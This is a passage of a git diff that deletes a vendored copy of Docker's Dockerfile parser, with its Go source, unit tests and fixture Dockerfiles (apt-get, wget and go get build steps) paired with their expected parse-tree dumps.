-				ch, chWidth = utf8.DecodeRuneInString(rest[pos:])
-			}
-			word += string(ch)
-		}
-	}
-
-	return words
-}
-
-// parse environment like statements. Note that this does *not* handle
-// variable interpolation, which will be handled in the evaluator.
-func parseNameVal(rest string, key string, d *Directive) (*Node, map[string]bool, error) {
-	// This is kind of tricky because we need to support the old
-	// variant:   KEY name value
-	// as well as the new one:    KEY name=value ...
-	// The trigger to know which one is being used will be whether we hit
-	// a space or = first.  space ==> old, "=" ==> new
-
-	words := parseWords(rest, d)
-	if len(words) == 0 {
-		return nil, nil, nil
-	}
-
-	var rootnode *Node
-
-	// Old format (KEY name value)
-	if !strings.Contains(words[0], "=") {
-		node := &Node{}
-		rootnode = node
-		strs := tokenWhitespace.Split(rest, 2)
-
-		if len(strs) < 2 {
-			return nil, nil, fmt.Errorf(key + " must have two arguments")
-		}
-
-		node.Value = strs[0]
-		node.Next = &Node{}
-		node.Next.Value = strs[1]
-	} else {
-		var prevNode *Node
-		for i, word := range words {
-			if !strings.Contains(word, "=") {
-				return nil, nil, fmt.Errorf("Syntax error - can't find = in %q. Must be of the form: name=value", word)
-			}
-			parts := strings.SplitN(word, "=", 2)
-
-			name := &Node{}
-			value := &Node{}
-
-			name.Next = value
-			name.Value = parts[0]
-			value.Value = parts[1]
-
-			if i == 0 {
-				rootnode = name
-			} else {
-				prevNode.Next = name
-			}
-			prevNode = value
-		}
-	}
-
-	return rootnode, nil, nil
-}
-
-func parseEnv(rest string, d *Directive) (*Node, map[string]bool, error) {
-	return parseNameVal(rest, "ENV", d)
-}
-
-func parseLabel(rest string, d *Directive) (*Node, map[string]bool, error) {
-	return parseNameVal(rest, "LABEL", d)
-}
-
-// parses a statement containing one or more keyword definition(s) and/or
-// value assignments, like `name1 name2= name3="" name4=value`.
-// Note that this is a stricter format than the old format of assignment,
-// allowed by parseNameVal(), in a way that this only allows assignment of the
-// form `keyword=[<value>]` like  `name2=`, `name3=""`, and `name4=value` above.
-// In addition, a keyword definition alone is of the form `keyword` like `name1`
-// above. And the assignments `name2=` and `name3=""` are equivalent and
-// assign an empty value to the respective keywords.
-func parseNameOrNameVal(rest string, d *Directive) (*Node, map[string]bool, error) {
-	words := parseWords(rest, d)
-	if len(words) == 0 {
-		return nil, nil, nil
-	}
-
-	var (
-		rootnode *Node
-		prevNode *Node
-	)
-	for i, word := range words {
-		node := &Node{}
-		node.Value = word
-		if i == 0 {
-			rootnode = node
-		} else {
-			prevNode.Next = node
-		}
-		prevNode = node
-	}
-
-	return rootnode, nil, nil
-}
-
-// parses a whitespace-delimited set of arguments. The result is effectively a
-// linked list of string arguments.
-func parseStringsWhitespaceDelimited(rest string, d *Directive) (*Node, map[string]bool, error) {
-	if rest == "" {
-		return nil, nil, nil
-	}
-
-	node := &Node{}
-	rootnode := node
-	prevnode := node
-	for _, str := range tokenWhitespace.Split(rest, -1) { // use regexp
-		prevnode = node
-		node.Value = str
-		node.Next = &Node{}
-		node = node.Next
-	}
-
-	// XXX to get around regexp.Split *always* providing an empty string at the
-	// end due to how our loop is constructed, nil out the last node in the
-	// chain.
-	prevnode.Next = nil
-
-	return rootnode, nil, nil
-}
-
-// parsestring just wraps the string in quotes and returns a working node.
-func parseString(rest string, d *Directive) (*Node, map[string]bool, error) {
-	if rest == "" {
-		return nil, nil, nil
-	}
-	n := &Node{}
-	n.Value = rest
-	return n, nil, nil
-}
-
-// parseJSON converts JSON arrays to an AST.
-func parseJSON(rest string, d *Directive) (*Node, map[string]bool, error) {
-	rest = strings.TrimLeftFunc(rest, unicode.IsSpace)
-	if !strings.HasPrefix(rest, "[") {
-		return nil, nil, fmt.Errorf(`Error parsing "%s" as a JSON array`, rest)
-	}
-
-	var myJSON []interface{}
-	if err := json.NewDecoder(strings.NewReader(rest)).Decode(&myJSON); err != nil {
-		return nil, nil, err
-	}
-
-	var top, prev *Node
-	for _, str := range myJSON {
-		s, ok := str.(string)
-		if !ok {
-			return nil, nil, errDockerfileNotStringArray
-		}
-
-		node := &Node{Value: s}
-		if prev == nil {
-			top = node
-		} else {
-			prev.Next = node
-		}
-		prev = node
-	}
-
-	return top, map[string]bool{"json": true}, nil
-}
-
-// parseMaybeJSON determines if the argument appears to be a JSON array. If
-// so, passes to parseJSON; if not, quotes the result and returns a single
-// node.
-func parseMaybeJSON(rest string, d *Directive) (*Node, map[string]bool, error) {
-	if rest == "" {
-		return nil, nil, nil
-	}
-
-	node, attrs, err := parseJSON(rest, d)
-
-	if err == nil {
-		return node, attrs, nil
-	}
-	if err == errDockerfileNotStringArray {
-		return nil, nil, err
-	}
-
-	node = &Node{}
-	node.Value = rest
-	return node, nil, nil
-}
-
-// parseMaybeJSONToList determines if the argument appears to be a JSON array. If
-// so, passes to parseJSON; if not, attempts to parse it as a whitespace
-// delimited string.
-func parseMaybeJSONToList(rest string, d *Directive) (*Node, map[string]bool, error) {
-	node, attrs, err := parseJSON(rest, d)
-
-	if err == nil {
-		return node, attrs, nil
-	}
-	if err == errDockerfileNotStringArray {
-		return nil, nil, err
-	}
-
-	return parseStringsWhitespaceDelimited(rest, d)
-}
-
-// The HEALTHCHECK command is like parseMaybeJSON, but has an extra type argument.
-func parseHealthConfig(rest string, d *Directive) (*Node, map[string]bool, error) {
-	// Find end of first argument
-	var sep int
-	for ; sep < len(rest); sep++ {
-		if unicode.IsSpace(rune(rest[sep])) {
-			break
-		}
-	}
-	next := sep
-	for ; next < len(rest); next++ {
-		if !unicode.IsSpace(rune(rest[next])) {
-			break
-		}
-	}
-
-	if sep == 0 {
-		return nil, nil, nil
-	}
-
-	typ := rest[:sep]
-	cmd, attrs, err := parseMaybeJSON(rest[next:], d)
-	if err != nil {
-		return nil, nil, err
-	}
-
-	return &Node{Value: typ, Next: cmd}, attrs, err
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go
deleted file mode 100644
index e534644491..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go
+++ /dev/null
@@ -1,221 +0,0 @@
-// Package parser implements a parser and parse tree dumper for Dockerfiles.
-package parser
-
-import (
-	"bufio"
-	"bytes"
-	"fmt"
-	"io"
-	"regexp"
-	"strings"
-	"unicode"
-
-	"github.com/docker/docker/builder/dockerfile/command"
-)
-
-// Node is a structure used to represent a parse tree.
-//
-// In the node there are three fields, Value, Next, and Children. Value is the
-// current token's string value. Next is always the next non-child token, and
-// children contains all the children. Here's an example:
-//
-// (value next (child child-next child-next-next) next-next)
-//
-// This data structure is frankly pretty lousy for handling complex languages,
-// but lucky for us the Dockerfile isn't very complicated. This structure
-// works a little more effectively than a "proper" parse tree for our needs.
-//
-type Node struct {
-	Value      string          // actual content
-	Next       *Node           // the next item in the current sexp
-	Children   []*Node         // the children of this sexp
-	Attributes map[string]bool // special attributes for this node
-	Original   string          // original line used before parsing
-	Flags      []string        // only top Node should have this set
-	StartLine  int             // the line in the original dockerfile where the node begins
-	EndLine    int             // the line in the original dockerfile where the node ends
-}
-
-// Directive is the structure used during a build run to hold the state of
-// parsing directives.
-type Directive struct {
-	EscapeToken           rune           // Current escape token
-	LineContinuationRegex *regexp.Regexp // Current line contination regex
-	LookingForDirectives  bool           // Whether we are currently looking for directives
-	EscapeSeen            bool           // Whether the escape directive has been seen
-}
-
-var (
-	dispatch           map[string]func(string, *Directive) (*Node, map[string]bool, error)
-	tokenWhitespace    = regexp.MustCompile(`[\t\v\f\r ]+`)
-	tokenEscapeCommand = regexp.MustCompile(`^#[ \t]*escape[ \t]*=[ \t]*(?P<escapechar>.).*$`)
-	tokenComment       = regexp.MustCompile(`^#.*$`)
-)
-
-// DefaultEscapeToken is the default escape token
-const DefaultEscapeToken = "\\"
-
-// SetEscapeToken sets the default token for escaping characters in a Dockerfile.
-func SetEscapeToken(s string, d *Directive) error {
-	if s != "`" && s != "\\" {
-		return fmt.Errorf("invalid ESCAPE '%s'. Must be ` or \\", s)
-	}
-	d.EscapeToken = rune(s[0])
-	d.LineContinuationRegex = regexp.MustCompile(`\` + s + `[ \t]*$`)
-	return nil
-}
-
-func init() {
-	// Dispatch Table. see line_parsers.go for the parse functions.
-	// The command is parsed and mapped to the line parser. The line parser
-	// receives the arguments but not the command, and returns an AST after
-	// reformulating the arguments according to the rules in the parser
-	// functions. Errors are propagated up by Parse() and the resulting AST can
-	// be incorporated directly into the existing AST as a next.
-	dispatch = map[string]func(string, *Directive) (*Node, map[string]bool, error){
-		command.Add:         parseMaybeJSONToList,
-		command.Arg:         parseNameOrNameVal,
-		command.Cmd:         parseMaybeJSON,
-		command.Copy:        parseMaybeJSONToList,
-		command.Entrypoint:  parseMaybeJSON,
-		command.Env:         parseEnv,
-		command.Expose:      parseStringsWhitespaceDelimited,
-		command.From:        parseString,
-		command.Healthcheck: parseHealthConfig,
-		command.Label:       parseLabel,
-		command.Maintainer:  parseString,
-		command.Onbuild:     parseSubCommand,
-		command.Run:         parseMaybeJSON,
-		command.Shell:       parseMaybeJSON,
-		command.StopSignal:  parseString,
-		command.User:        parseString,
-		command.Volume:      parseMaybeJSONToList,
-		command.Workdir:     parseString,
-	}
-}
-
-// ParseLine parses a line and returns the remainder.
-func ParseLine(line string, d *Directive, ignoreCont bool) (string, *Node, error) {
-	// Handle the parser directive '# escape=<char>. Parser directives must precede
-	// any builder instruction or other comments, and cannot be repeated.
-	if d.LookingForDirectives {
-		tecMatch := tokenEscapeCommand.FindStringSubmatch(strings.ToLower(line))
-		if len(tecMatch) > 0 {
-			if d.EscapeSeen == true {
-				return "", nil, fmt.Errorf("only one escape parser directive can be used")
-			}
-			for i, n := range tokenEscapeCommand.SubexpNames() {
-				if n == "escapechar" {
-					if err := SetEscapeToken(tecMatch[i], d); err != nil {
-						return "", nil, err
-					}
-					d.EscapeSeen = true
-					return "", nil, nil
-				}
-			}
-		}
-	}
-
-	d.LookingForDirectives = false
-
-	if line = stripComments(line); line == "" {
-		return "", nil, nil
-	}
-
-	if !ignoreCont && d.LineContinuationRegex.MatchString(line) {
-		line = d.LineContinuationRegex.ReplaceAllString(line, "")
-		return line, nil, nil
-	}
-
-	cmd, flags, args, err := splitCommand(line)
-	if err != nil {
-		return "", nil, err
-	}
-
-	node := &Node{}
-	node.Value = cmd
-
-	sexp, attrs, err := fullDispatch(cmd, args, d)
-	if err != nil {
-		return "", nil, err
-	}
-
-	node.Next = sexp
-	node.Attributes = attrs
-	node.Original = line
-	node.Flags = flags
-
-	return "", node, nil
-}
-
-// Parse is the main parse routine.
-// It handles an io.ReadWriteCloser and returns the root of the AST.
-func Parse(rwc io.Reader, d *Directive) (*Node, error) {
-	currentLine := 0
-	root := &Node{}
-	root.StartLine = -1
-	scanner := bufio.NewScanner(rwc)
-
-	utf8bom := []byte{0xEF, 0xBB, 0xBF}
-	for scanner.Scan() {
-		scannedBytes := scanner.Bytes()
-		// We trim UTF8 BOM
-		if currentLine == 0 {
-			scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom)
-		}
-		scannedLine := strings.TrimLeftFunc(string(scannedBytes), unicode.IsSpace)
-		currentLine++
-		line, child, err := ParseLine(scannedLine, d, false)
-		if err != nil {
-			return nil, err
-		}
-		startLine := currentLine
-
-		if line != "" && child == nil {
-			for scanner.Scan() {
-				newline := scanner.Text()
-				currentLine++
-
-				if stripComments(strings.TrimSpace(newline)) == "" {
-					continue
-				}
-
-				line, child, err = ParseLine(line+newline, d, false)
-				if err != nil {
-					return nil, err
-				}
-
-				if child != nil {
-					break
-				}
-			}
-			if child == nil && line != "" {
-				// When we call ParseLine we'll pass in 'true' for
-				// the ignoreCont param if we're at the EOF. This will
-				// prevent the func from returning immediately w/o
-				// parsing the line thinking that there's more input
-				// to come.
-
-				_, child, err = ParseLine(line, d, scanner.Err() == nil)
-				if err != nil {
-					return nil, err
-				}
-			}
-		}
-
-		if child != nil {
-			// Update the line information for the current child.
-			child.StartLine = startLine
-			child.EndLine = currentLine
-			// Update the line information for the root. The starting line of the root is always the
-			// starting line of the first child and the ending line is the ending line of the last child.
-			if root.StartLine < 0 {
-				root.StartLine = currentLine
-			}
-			root.EndLine = currentLine
-			root.Children = append(root.Children, child)
-		}
-	}
-
-	return root, nil
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go
deleted file mode 100644
index e8e26961de..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go
+++ /dev/null
@@ -1,173 +0,0 @@
-package parser
-
-import (
-	"bytes"
-	"fmt"
-	"io/ioutil"
-	"os"
-	"path/filepath"
-	"runtime"
-	"testing"
-)
-
-const testDir = "testfiles"
-const negativeTestDir = "testfiles-negative"
-const testFileLineInfo = "testfile-line/Dockerfile"
-
-func getDirs(t *testing.T, dir string) []string {
-	f, err := os.Open(dir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	defer f.Close()
-
-	dirs, err := f.Readdirnames(0)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	return dirs
-}
-
-func TestTestNegative(t *testing.T) {
-	for _, dir := range getDirs(t, negativeTestDir) {
-		dockerfile := filepath.Join(negativeTestDir, dir, "Dockerfile")
-
-		df, err := os.Open(dockerfile)
-		if err != nil {
-			t.Fatalf("Dockerfile missing for %s: %v", dir, err)
-		}
-		defer df.Close()
-
-		d := Directive{LookingForDirectives: true}
-		SetEscapeToken(DefaultEscapeToken, &d)
-		_, err = Parse(df, &d)
-		if err == nil {
-			t.Fatalf("No error parsing broken dockerfile for %s", dir)
-		}
-	}
-}
-
-func TestTestData(t *testing.T) {
-	for _, dir := range getDirs(t, testDir) {
-		dockerfile := filepath.Join(testDir, dir, "Dockerfile")
-		resultfile := filepath.Join(testDir, dir, "result")
-
-		df, err := os.Open(dockerfile)
-		if err != nil {
-			t.Fatalf("Dockerfile missing for %s: %v", dir, err)
-		}
-		defer df.Close()
-
-		d := Directive{LookingForDirectives: true}
-		SetEscapeToken(DefaultEscapeToken, &d)
-		ast, err := Parse(df, &d)
-		if err != nil {
-			t.Fatalf("Error parsing %s's dockerfile: %v", dir, err)
-		}
-
-		content, err := ioutil.ReadFile(resultfile)
-		if err != nil {
-			t.Fatalf("Error reading %s's result file: %v", dir, err)
-		}
-
-		if runtime.GOOS == "windows" {
-			// CRLF --> CR to match Unix behavior
-			content = bytes.Replace(content, []byte{'\x0d', '\x0a'}, []byte{'\x0a'}, -1)
-		}
-
-		if ast.Dump()+"\n" != string(content) {
-			fmt.Fprintln(os.Stderr, "Result:\n"+ast.Dump())
-			fmt.Fprintln(os.Stderr, "Expected:\n"+string(content))
-			t.Fatalf("%s: AST dump of dockerfile does not match result", dir)
-		}
-	}
-}
-
-func TestParseWords(t *testing.T) {
-	tests := []map[string][]string{
-		{
-			"input":  {"foo"},
-			"expect": {"foo"},
-		},
-		{
-			"input":  {"foo bar"},
-			"expect": {"foo", "bar"},
-		},
-		{
-			"input":  {"foo\\ bar"},
-			"expect": {"foo\\ bar"},
-		},
-		{
-			"input":  {"foo=bar"},
-			"expect": {"foo=bar"},
-		},
-		{
-			"input":  {"foo bar 'abc xyz'"},
-			"expect": {"foo", "bar", "'abc xyz'"},
-		},
-		{
-			"input":  {`foo bar "abc xyz"`},
-			"expect": {"foo", "bar", `"abc xyz"`},
-		},
-		{
-			"input":  {"àöû"},
-			"expect": {"àöû"},
-		},
-		{
-			"input":  {`föo bàr "âbc xÿz"`},
-			"expect": {"föo", "bàr", `"âbc xÿz"`},
-		},
-	}
-
-	for _, test := range tests {
-		d := Directive{LookingForDirectives: true}
-		SetEscapeToken(DefaultEscapeToken, &d)
-		words := parseWords(test["input"][0], &d)
-		if len(words) != len(test["expect"]) {
-			t.Fatalf("length check failed. input: %v, expect: %q, output: %q", test["input"][0], test["expect"], words)
-		}
-		for i, word := range words {
-			if word != test["expect"][i] {
-				t.Fatalf("word check failed for word: %q. input: %q, expect: %q, output: %q", word, test["input"][0], test["expect"], words)
-			}
-		}
-	}
-}
-
-func TestLineInformation(t *testing.T) {
-	df, err := os.Open(testFileLineInfo)
-	if err != nil {
-		t.Fatalf("Dockerfile missing for %s: %v", testFileLineInfo, err)
-	}
-	defer df.Close()
-
-	d := Directive{LookingForDirectives: true}
-	SetEscapeToken(DefaultEscapeToken, &d)
-	ast, err := Parse(df, &d)
-	if err != nil {
-		t.Fatalf("Error parsing dockerfile %s: %v", testFileLineInfo, err)
-	}
-
-	if ast.StartLine != 5 || ast.EndLine != 31 {
-		fmt.Fprintf(os.Stderr, "Wrong root line information: expected(%d-%d), actual(%d-%d)\n", 5, 31, ast.StartLine, ast.EndLine)
-		t.Fatalf("Root line information doesn't match result.")
-	}
-	if len(ast.Children) != 3 {
-		fmt.Fprintf(os.Stderr, "Wrong number of child: expected(%d), actual(%d)\n", 3, len(ast.Children))
-		t.Fatalf("Root line information doesn't match result for %s", testFileLineInfo)
-	}
-	expected := [][]int{
-		{5, 5},
-		{11, 12},
-		{17, 31},
-	}
-	for i, child := range ast.Children {
-		if child.StartLine != expected[i][0] || child.EndLine != expected[i][1] {
-			t.Logf("Wrong line information for child %d: expected(%d-%d), actual(%d-%d)\n",
-				i, expected[i][0], expected[i][1], child.StartLine, child.EndLine)
-			t.Fatalf("Root line information doesn't match result.")
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile
deleted file mode 100644
index c7601c9f69..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile
+++ /dev/null
@@ -1,35 +0,0 @@
-# ESCAPE=\
-
-
-
-FROM brimstone/ubuntu:14.04
-
-
-# TORUN -v /var/run/docker.sock:/var/run/docker.sock
-
-
-ENV GOPATH \
-/go
-
-
-
-# Install the packages we need, clean up after them and us
-RUN apt-get update \
-	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \
-
-
-    && apt-get install -y --no-install-recommends git golang ca-certificates \
-    && apt-get clean \
-    && rm -rf /var/lib/apt/lists \
-
-	&& go get -v github.com/brimstone/consuldock \
-    && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \
-
-	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \
-	&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \
-	&& rm /tmp/dpkg.* \
-	&& rm -rf $GOPATH
-
-
-
-
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile
deleted file mode 100644
index 1d65578794..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile
+++ /dev/null
@@ -1,3 +0,0 @@
-FROM busybox
-
-ENV PATH
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile
deleted file mode 100644
index d1be4596c7..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile
+++ /dev/null
@@ -1 +0,0 @@
-CMD [ "echo", [ "nested json" ] ]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile
deleted file mode 100644
index 00b444cba5..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile
+++ /dev/null
@@ -1,11 +0,0 @@
-FROM	ubuntu:14.04
-MAINTAINER	Seongyeol Lim <seongyeol37@gmail.com>
-
-COPY	.	/go/src/github.com/docker/docker
-ADD		.	/
-ADD		null /
-COPY	nullfile /tmp
-ADD		[ "vimrc", "/tmp" ]
-COPY	[ "bashrc", "/tmp" ]
-COPY	[ "test file", "/tmp" ]
-ADD		[ "test file", "/tmp/test file" ]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result
deleted file mode 100644
index 85aee64018..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result
+++ /dev/null
@@ -1,10 +0,0 @@
-(from "ubuntu:14.04")
-(maintainer "Seongyeol Lim <seongyeol37@gmail.com>")
-(copy "." "/go/src/github.com/docker/docker")
-(add "." "/")
-(add "null" "/")
-(copy "nullfile" "/tmp")
-(add "vimrc" "/tmp")
-(copy "bashrc" "/tmp")
-(copy "test file" "/tmp")
-(add "test file" "/tmp/test file")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile
deleted file mode 100644
index 0364ef9d96..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile
+++ /dev/null
@@ -1,26 +0,0 @@
-#escape=\
-FROM brimstone/ubuntu:14.04
-
-MAINTAINER brimstone@the.narro.ws
-
-# TORUN -v /var/run/docker.sock:/var/run/docker.sock
-
-ENV GOPATH /go
-
-# Set our command
-ENTRYPOINT ["/usr/local/bin/consuldock"]
-
-# Install the packages we need, clean up after them and us
-RUN apt-get update \
-	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \
-    && apt-get install -y --no-install-recommends git golang ca-certificates \
-    && apt-get clean \
-    && rm -rf /var/lib/apt/lists \
-
-	&& go get -v github.com/brimstone/consuldock \
-    && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \
-
-	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \
-	&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \
-	&& rm /tmp/dpkg.* \
-	&& rm -rf $GOPATH
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result
deleted file mode 100644
index 227f748cda..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result
+++ /dev/null
@@ -1,5 +0,0 @@
-(from "brimstone/ubuntu:14.04")
-(maintainer "brimstone@the.narro.ws")
-(env "GOPATH" "/go")
-(entrypoint "/usr/local/bin/consuldock")
-(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean     && apt-get install -y --no-install-recommends git golang ca-certificates     && apt-get clean     && rm -rf /var/lib/apt/lists \t&& go get -v github.com/brimstone/consuldock     && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.* \t&& rm -rf $GOPATH")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile
deleted file mode 100644
index 25ae352166..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile
+++ /dev/null
@@ -1,52 +0,0 @@
-FROM brimstone/ubuntu:14.04
-
-CMD []
-
-ENTRYPOINT ["/usr/bin/consul", "agent", "-server", "-data-dir=/consul", "-client=0.0.0.0", "-ui-dir=/webui"]
-
-EXPOSE 8500 8600 8400 8301 8302
-
-RUN apt-get update \
-    && apt-get install -y unzip wget \
-	&& apt-get clean \
-	&& rm -rf /var/lib/apt/lists
-
-RUN cd /tmp \
-    && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip \
-       -O web_ui.zip \
-    && unzip web_ui.zip \
-    && mv dist /webui \
-    && rm web_ui.zip
-
-RUN apt-get update \
-	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \
-    && apt-get install -y --no-install-recommends unzip wget \
-    && apt-get clean \
-    && rm -rf /var/lib/apt/lists \
-
-    && cd /tmp \
-    && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip \
-       -O web_ui.zip \
-    && unzip web_ui.zip \
-    && mv dist /webui \
-    && rm web_ui.zip \
-
-	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \
-	&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \
-	&& rm /tmp/dpkg.*
-
-ENV GOPATH /go
-
-RUN apt-get update \
-	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \
-    && apt-get install -y --no-install-recommends git golang ca-certificates build-essential \
-    && apt-get clean \
-    && rm -rf /var/lib/apt/lists \
-
-	&& go get -v github.com/hashicorp/consul \
-	&& mv $GOPATH/bin/consul /usr/bin/consul \
-
-	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \
-	&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \
-	&& rm /tmp/dpkg.* \
-	&& rm -rf $GOPATH
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result
deleted file mode 100644
index 16492e516a..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result
+++ /dev/null
@@ -1,9 +0,0 @@
-(from "brimstone/ubuntu:14.04")
-(cmd)
-(entrypoint "/usr/bin/consul" "agent" "-server" "-data-dir=/consul" "-client=0.0.0.0" "-ui-dir=/webui")
-(expose "8500" "8600" "8400" "8301" "8302")
-(run "apt-get update     && apt-get install -y unzip wget \t&& apt-get clean \t&& rm -rf /var/lib/apt/lists")
-(run "cd /tmp     && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip        -O web_ui.zip     && unzip web_ui.zip     && mv dist /webui     && rm web_ui.zip")
-(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean     && apt-get install -y --no-install-recommends unzip wget     && apt-get clean     && rm -rf /var/lib/apt/lists     && cd /tmp     && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip        -O web_ui.zip     && unzip web_ui.zip     && mv dist /webui     && rm web_ui.zip \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.*")
-(env "GOPATH" "/go")
-(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean     && apt-get install -y --no-install-recommends git golang ca-certificates build-essential     && apt-get clean     && rm -rf /var/lib/apt/lists \t&& go get -v github.com/hashicorp/consul \t&& mv $GOPATH/bin/consul /usr/bin/consul \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.* \t&& rm -rf $GOPATH")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile
deleted file mode 100644
index 42b324e77b..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile
+++ /dev/null
@@ -1,36 +0,0 @@
-FROM ubuntu:14.04
-
-RUN echo hello\
-  world\
-  goodnight  \
-  moon\
-  light\
-ning
-RUN echo hello  \
-  world
-RUN echo hello  \
-world
-RUN echo hello \
-goodbye\
-frog
-RUN echo hello  \  
-world
-RUN echo hi \
- \
- world \
-\
- good\
-\
-night
-RUN echo goodbye\
-frog
-RUN echo good\
-bye\
-frog
-
-RUN echo hello \
-# this is a comment
-
-# this is a comment with a blank line surrounding it
-
-this is some more useful stuff
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result
deleted file mode 100644
index 268ae073c8..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result
+++ /dev/null
@@ -1,10 +0,0 @@
-(from "ubuntu:14.04")
-(run "echo hello  world  goodnight    moon  lightning")
-(run "echo hello    world")
-(run "echo hello  world")
-(run "echo hello goodbyefrog")
-(run "echo hello  world")
-(run "echo hi   world  goodnight")
-(run "echo goodbyefrog")
-(run "echo goodbyefrog")
-(run "echo hello this is some more useful stuff")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile
deleted file mode 100644
index 8ccb71a578..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile
+++ /dev/null
@@ -1,54 +0,0 @@
